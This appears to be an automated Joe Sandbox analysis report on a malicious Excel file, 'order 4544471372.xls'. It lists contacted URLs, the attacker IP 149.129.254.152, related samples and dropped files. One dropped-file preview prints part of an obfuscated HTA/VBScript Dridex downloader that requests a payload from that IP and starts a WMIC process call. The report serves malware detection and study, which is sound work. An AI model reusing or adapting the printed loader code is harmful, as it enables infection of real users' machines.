                                                                                                  http://weather.service.msn.com/data.aspxEXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                    high
                                                                                                    https://login.windows.net/common/oauth2/authorizePVEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                                                                                      high
                                                                                                      https://outlook.office365.com/autodiscover/autodiscover.jsonYEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                                        high
                                                                                                        https://substrate.office.comPEXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        http://149.129.254.152:8080/6tfcnfucknugget4gpenis3damshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmpfalse
                                                                                                        • Avira URL Cloud: safe
                                                                                                        unknown
                                                                                                        https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                          high
                                                                                                          https://substrate.office.comSEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                            high
                                                                                                            https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2AzurEXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpfalse
                                                                                                              high
                                                                                                              https://devnull.onenote.comMBI_SSL_SHORTEXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              low
                                                                                                              https://substrate.office.comWEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://analysis.windows.net/powerbi/apiBEXCEL.EXE, 00000000.00000003.463050039.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.396929162.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544045161.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263447705.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350253673.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.460111881.0000000013215000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.459950914.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383864499.000000001321C000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261336835.000000001321E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.383803999.0000000013209000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263029066.0000000013209000.00000004.00000001.sdmpfalse
                                                                                                                high
                                                                                                                https://api.microsoftstream.com/api/StreamVideoBasehttps://web.microsoftstream.com/video/PPTQuickStaEXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  https://login.windows.net/common/oauth2/authorizeaEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://149.129.254.152:8080/6tfcmshta.exe, 0000001A.00000003.469151527.0000020F088F8000.00000004.00000001.sdmpfalse
                                                                                                                    • Avira URL Cloud: safe
                                                                                                                    unknown
                                                                                                                    https://api.addins.omex.office.net/appstate/queryFgpEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonPEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        https://wus2.contentsync.EXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261328451.000000001320F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://onedrive.live.comedEXCEL.EXE, 00000000.00000003.396504480.0000000012FCB000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.543540101.0000000012F99000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://149.129.254.152:8080/6tfcnfucknugget4gpenis3dadVmshta.exe, 0000001A.00000003.469104734.0000020F088BC000.00000004.00000001.sdmp, mshta.exe, 0000001A.00000002.534411624.0000020F088B5000.00000004.00000020.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        https://clients.config.office.net/user/v1.0/iosD2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.diagnostics.office.com#vEXCEL.EXE, 00000000.00000003.462955973.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.262867755.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.263246828.0000000015A31000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.544699284.0000000015A17000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.350831613.0000000015A18000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.261230471.0000000015A31000.00000004.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                                              high
                                                                                                                              https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileBearerEXCEL.EXE, 00000000.00000003.261353142.00000000131FF000.00000004.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, 00000000.00000003.261269362.000000000F66F000.00000004.00000001.sdmp, D2E8A974-A9E1-4AA2-B9A4-381BFC494102.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://login.windows.net/common/oauth2/authorize=UoEXCEL.EXE, 00000000.00000002.543479968.0000000012F44000.00000004.00000001.sdmpfalse
                                                                                                                                    high

                                                                                                                                    Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    149.129.254.152
                                                                                                                                    unknownSingapore
                                                                                                                                    45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCfalse

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                    Analysis ID:532575
                                                                                                                                    Start date:02.12.2021
                                                                                                                                    Start time:14:10:32
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 6m 49s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:full
                                                                                                                                    Sample file name:order 4544471372.xls
                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                    Number of analysed new started processes analysed:28
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.troj.expl.evad.winXLS@7/8@0/1
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HDC Information:Failed
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                    • Number of executed functions: 0
                                                                                                                                    • Number of non-executed functions: 2
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                    • Attach to Office via COM
                                                                                                                                    • Scroll down
                                                                                                                                    • Close Viewer
                                                                                                                                    Warnings:
                                                                                                                                    Show All
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.211.6.115, 52.109.2.0, 52.109.8.25, 52.109.88.39
                                                                                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, prod-w.nexus.live.com.akadns.net, prod.configsvc1.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    14:13:10API Interceptor1x Sleep call for process: WMIC.exe modified
                                                                                                                                    14:13:13API Interceptor2x Sleep call for process: mshta.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    149.129.254.152SecuriteInfo.com.Heur.31616.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    SecuriteInfo.com.Heur.26641.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    plans_48055147646.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    plans_48055147646.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    invoice template929473689.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    invoice template929473689.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    variants_589243533.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    highlights-40677152292.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    variants_589243533.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    highlights-40677152292.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    variants_8857120413.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    variants_8857120413.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    payment_4151226701.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    alternatives-990191355.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc
                                                                                                                                    highlights86151613925.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152:8080/6tfcnfucknugget4gpenis3dade5z6cpc

                                                                                                                                    Domains

                                                                                                                                    No context

                                                                                                                                    ASN

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCorder 4544471372.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    SecuriteInfo.com.Heur.31616.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    SecuriteInfo.com.Heur.26641.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    SecuriteInfo.com.Heur.5035.docGet hashmaliciousBrowse
                                                                                                                                    • 8.209.79.68
                                                                                                                                    SecuriteInfo.com.Heur.6074.docGet hashmaliciousBrowse
                                                                                                                                    • 8.209.79.68
                                                                                                                                    plans_48055147646.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    plans_48055147646.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    SecuriteInfo.com.Heur.31820.docGet hashmaliciousBrowse
                                                                                                                                    • 8.209.79.68
                                                                                                                                    SecuriteInfo.com.Heur.17389.docGet hashmaliciousBrowse
                                                                                                                                    • 8.209.79.68
                                                                                                                                    SecuriteInfo.com.Heur.28256.docGet hashmaliciousBrowse
                                                                                                                                    • 8.209.79.68
                                                                                                                                    invoice template929473689.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    invoice template929473689.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    variants_589243533.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    highlights-40677152292.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    variants_589243533.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    highlights-40677152292.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    variants_8857120413.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    variants_8857120413.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    payment_4151226701.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152
                                                                                                                                    alternatives-990191355.xlsGet hashmaliciousBrowse
                                                                                                                                    • 149.129.254.152

                                                                                                                                    JA3 Fingerprints

                                                                                                                                    No context

                                                                                                                                    Dropped Files

                                                                                                                                    No context

                                                                                                                                    Created / dropped Files

                                                                                                                                    C:\ProgramData\tCeltZ.rtf
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                    Category:modified
                                                                                                                                    Size (bytes):5004
                                                                                                                                    Entropy (8bit):5.102988854105844
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:NZVagS812z4VR9r+ZYjrPd06dtalqZPV1sCxKfvM6YGYGJAHHJKZz2mJuR/x3VGK:NZQ012z4/1+ZYjbyKmqZ1xAnYPGMcym6
                                                                                                                                    MD5:A98108794EDA278A4E8626B56FE4B231
                                                                                                                                    SHA1:C0AB9E72B0E85C5BFB6B89F1428B5240EC6AEA60
                                                                                                                                    SHA-256:DE3A47367EF37CD391133E378F03FE317D98A7916E4E192E5513EC19159A10D9
                                                                                                                                    SHA-512:33C3233FABFB9BA0A79E1AAF7CD2F8861C81971454362315CFF8366D8647E91CFEBF49BA82E26FA7D090D92E203723D1C61F74BEDD0A280145C000470BFDBA9F
                                                                                                                                    Malicious:true
                                                                                                                                    Yara Hits:
                                                                                                                                    • Rule: JoeSecurity_DridexDownloader, Description: Yara detected Dridex Downloader, Source: C:\ProgramData\tCeltZ.rtf, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: <!DOCTYPE html>..<html>..<head>..<HTA:APPLICATION ID="CS"..APPLICATIONNAME="ttrgnkrtegjtjgjerg"..WINDOWSTATE="minimize"..MAXIMIZEBUTTON="no"..MINIMIZEBUTTON="no"..CAPTION="no"..SHOWINTASKBAR="no">..<script type="text/vbscript" LANGUAGE="VBScript" >....Function PRGgdsXbPi()..Set uPWUurSwKjJEMwcj = CreateObject(Chr(77) & "SX" & Chr(77) & "" & "" & Chr(76) & Chr(50) & ".Se" & "rv" & "erX" & "MLH" & Chr(84) & "" & Chr(84) & "P." & "6.0" & "")..uPWUurSwKjJEMwcj.Open "" & "" & "" & "" & "GE" & Chr(84) & "", "ht" & Chr(116) & "p:/" & Chr(47) & "14" & "9." & "12" & "9.2" & "54." & "" & "152" & ":8" & "080" & "" & "/6" & "" & "tfc" & "nfu" & Chr(99) & Chr(107) & "nu" & "gg" & "et" & "4g" & Chr(112) & "en" & "is" & "3da" & Chr(100) & "" & "" & "e5" & "z6c" & "pc", False ..uPWUurSwKjJEMwcj.SetRequestHeader "User-Agent","rape"..uPWUurSwKjJEMwcj.Send..End Function....Function VKcVtLgGiyUyBtF()..NiJZKsgWiRQhouXQ = "wmi" & "c " & Chr(112) & Chr(114) & "oc" & "ess" & Chr(32) & "cal" & "l " & Chr(99) &
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\D2E8A974-A9E1-4AA2-B9A4-381BFC494102
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):140372
                                                                                                                                    Entropy (8bit):5.357219203875202
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:gcQIfgxrBdA3gBwtnQ9DQW+zUA4Ff7nXmvid1XiE6LWmE9:suQ9DQW+zmXfH
                                                                                                                                    MD5:1DF0BE5F1698F4B884B4CC28BF995534
                                                                                                                                    SHA1:28CC332994478E147DDA43626FE2D96AF985B20D
                                                                                                                                    SHA-256:A9E4C7089DA384A44AF2CA841EF9C90D21ACFD952F929BB7D95A55AD324B0800
                                                                                                                                    SHA-512:0BCA09555484E0F518EE508066EEA9709EBEEE96033787DA8940034DD1E875E27FD49D2ED8D0994607FEEC2C619B9F5CEA270D826B22698AE475D833D76F7ADC
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-12-02T13:11:37">.. Build: 16.0.14729.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\8B26352.png
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:PNG image data, 1170 x 183, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):101504
                                                                                                                                    Entropy (8bit):7.9825226677650285
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:LxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6NljwSWEx02l9dIND145:GahmlYOOeRnwNKIde145
                                                                                                                                    MD5:AA4CE969F3A7539F94F12DBA43D9D36F
                                                                                                                                    SHA1:67FBAFD61ABB04C68A2C4E074959C49AF1CF6DBB
                                                                                                                                    SHA-256:BC3719669DEBD201C5FE2E16EB38605287FDD5DAB45445264388A58282F28999
                                                                                                                                    SHA-512:78E78115A9929B04E5C4D26A735E9CC76831525A51C7CD97FDA849BD9377C3FEE503E770C7CF9B5FF1E0F13F0A4A38F21A8E164C1CA8C038F110D877EC7175CE
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:moderate, very likely benign file
                                                                                                                                    Preview: .PNG........IHDR.............I.t....JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                                                                                                                                    C:\Users\user\Desktop\FFC20000
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):155069
                                                                                                                                    Entropy (8bit):7.95786658122654
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:UU3HAnIoTFJ3AA3YqICxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6NljwSWEe:UkAIcFFAkIVahmlYOOeRnwNKIde14Q
                                                                                                                                    MD5:07145F1486F9558BEE707ABC21FD5CC1
                                                                                                                                    SHA1:27734E41E3D924005BA90DAA04615538EE2E8CA5
                                                                                                                                    SHA-256:1ED04CC0F0DB6AAC22E194014FE8EBB8490C2BAC5B8BD5B77ADA201C0BD93392
                                                                                                                                    SHA-512:72D181CA5D45488CBACD1BDD0979C86FFB8DC2B63A7B6D9BD32934C2B2DFD847E12B0B85622C8063292BA8D2DDE5C22CB80827A6ACD8A44FC382DA6010686939
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C.+J.r@.5.....(.....7y..=.tA.nQ/Y......Lo...XBD.].U...W.Mk.5z-.Y.I8%.wP.5 ..ooz.u.,(.a.f).'.Q....|.G;...H...<.9.S.......%p.LY..{/0.....7...c.......h).%.N...~2.....K....B.. YS....?!%*..?..n...m.9....`.].[.*.lJ...xGf.!..>l....F....1..Kn...>.....".L.%.$..q..BF?tbl...v......P.....}...jK.{.O.....<..s....BO....bZ...<mS.F..YE.[.o...w+t.K]..}@....W...]....4......i.\m3.1.@.`.fl.........PK..........!..U0#...
                                                                                                                                    C:\Users\user\Desktop\FFC20000:Zone.Identifier
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):26
